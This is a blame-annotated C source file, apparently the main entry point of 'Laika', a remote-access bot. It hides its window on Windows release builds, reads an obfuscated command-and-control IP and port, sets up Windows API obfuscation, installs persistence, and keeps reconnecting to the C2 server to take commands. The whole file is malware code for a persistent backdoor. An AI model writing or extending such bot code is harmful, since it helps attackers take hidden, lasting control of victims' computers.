2022-06-27 23:57:00 +00:00
|
|
|
#include "bot.h"
|
2022-05-19 06:42:40 +00:00
|
|
|
#include "lbox.h"
|
2022-03-15 18:05:11 +00:00
|
|
|
#include "lconfig.h"
|
2022-01-25 03:46:29 +00:00
|
|
|
#include "lerror.h"
|
2022-02-21 23:25:49 +00:00
|
|
|
#include "ltask.h"
|
2022-07-08 04:23:39 +00:00
|
|
|
#include "obf.h"
|
2022-04-07 23:11:58 +00:00
|
|
|
#include "persist.h"
|
2022-06-27 23:57:00 +00:00
|
|
|
#include "shell.h"
|
|
|
|
|
|
|
|
#include <stdio.h>
|
2022-02-21 23:25:49 +00:00
|
|
|
|
2022-05-15 23:14:29 +00:00
|
|
|
#ifdef _WIN32
|
2022-06-29 22:45:51 +00:00
|
|
|
# ifndef DEBUG
|
2022-06-27 23:57:00 +00:00
|
|
|
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow)
|
|
|
|
{
|
2022-06-29 22:45:51 +00:00
|
|
|
# else
|
2022-06-27 23:57:00 +00:00
|
|
|
int main()
|
|
|
|
{
|
2022-06-29 22:45:51 +00:00
|
|
|
# endif
|
2022-05-15 23:14:29 +00:00
|
|
|
#else
|
2022-06-27 23:57:00 +00:00
|
|
|
int main()
|
|
|
|
{
|
2022-05-15 23:14:29 +00:00
|
|
|
#endif
|
2022-06-27 23:57:00 +00:00
|
|
|
/* these boxes are really easy to dump, they're unlocked at the very start of execution and left
|
2022-06-29 22:45:51 +00:00
|
|
|
in memory the entire time. not only that but they're only obfuscating the ip & port, both are
|
|
|
|
things anyone would see from opening wireshark */
|
2022-06-27 23:57:00 +00:00
|
|
|
LAIKA_BOX_SKID_START(char *, cncIP, LAIKA_CNC_IP);
|
|
|
|
LAIKA_BOX_SKID_START(char *, cncPORT, LAIKA_CNC_PORT);
|
2022-04-10 20:45:30 +00:00
|
|
|
struct sLaika_bot *bot;
|
2022-01-25 03:46:29 +00:00
|
|
|
|
2022-07-08 04:23:39 +00:00
|
|
|
/* init API obfuscation (windows only) */
|
|
|
|
laikaO_init();
|
|
|
|
|
2022-04-17 03:56:05 +00:00
|
|
|
#ifdef LAIKA_PERSISTENCE
|
|
|
|
laikaB_markRunning();
|
|
|
|
|
2022-04-07 23:11:58 +00:00
|
|
|
/* install persistence */
|
|
|
|
laikaB_tryPersist();
|
2022-04-10 20:45:30 +00:00
|
|
|
do {
|
|
|
|
#endif
|
|
|
|
bot = laikaB_newBot();
|
|
|
|
|
|
|
|
LAIKA_TRY
|
|
|
|
/* connect to test CNC */
|
2022-05-19 06:42:40 +00:00
|
|
|
laikaB_connectToCNC(bot, cncIP, cncPORT);
|
2022-04-10 20:45:30 +00:00
|
|
|
|
|
|
|
/* while connection is still alive, poll bot */
|
|
|
|
while (laikaS_isAlive((&bot->peer->sock))) {
|
2022-04-14 17:11:29 +00:00
|
|
|
laikaB_poll(bot);
|
2022-04-10 20:45:30 +00:00
|
|
|
}
|
|
|
|
LAIKA_TRYEND
|
|
|
|
|
|
|
|
/* bot was killed or it threw an error */
|
|
|
|
laikaB_freeBot(bot);
|
|
|
|
#ifdef LAIKA_PERSISTENCE
|
2022-06-29 22:45:51 +00:00
|
|
|
# ifdef _WIN32
|
2022-04-17 04:54:07 +00:00
|
|
|
Sleep(5000);
|
2022-06-29 22:45:51 +00:00
|
|
|
# else
|
2022-04-10 20:45:30 +00:00
|
|
|
sleep(5);
|
2022-06-29 22:45:51 +00:00
|
|
|
# endif
|
2022-04-10 20:45:30 +00:00
|
|
|
} while (1);
|
2022-04-17 03:56:05 +00:00
|
|
|
|
|
|
|
laikaB_unmarkRunning();
|
2022-04-10 20:45:30 +00:00
|
|
|
#endif
|
2022-02-21 23:25:49 +00:00
|
|
|
|
2022-05-19 06:42:40 +00:00
|
|
|
/* vm boxes are left opened */
|
2022-01-25 03:46:29 +00:00
|
|
|
return 0;
|
|
|
|
}
|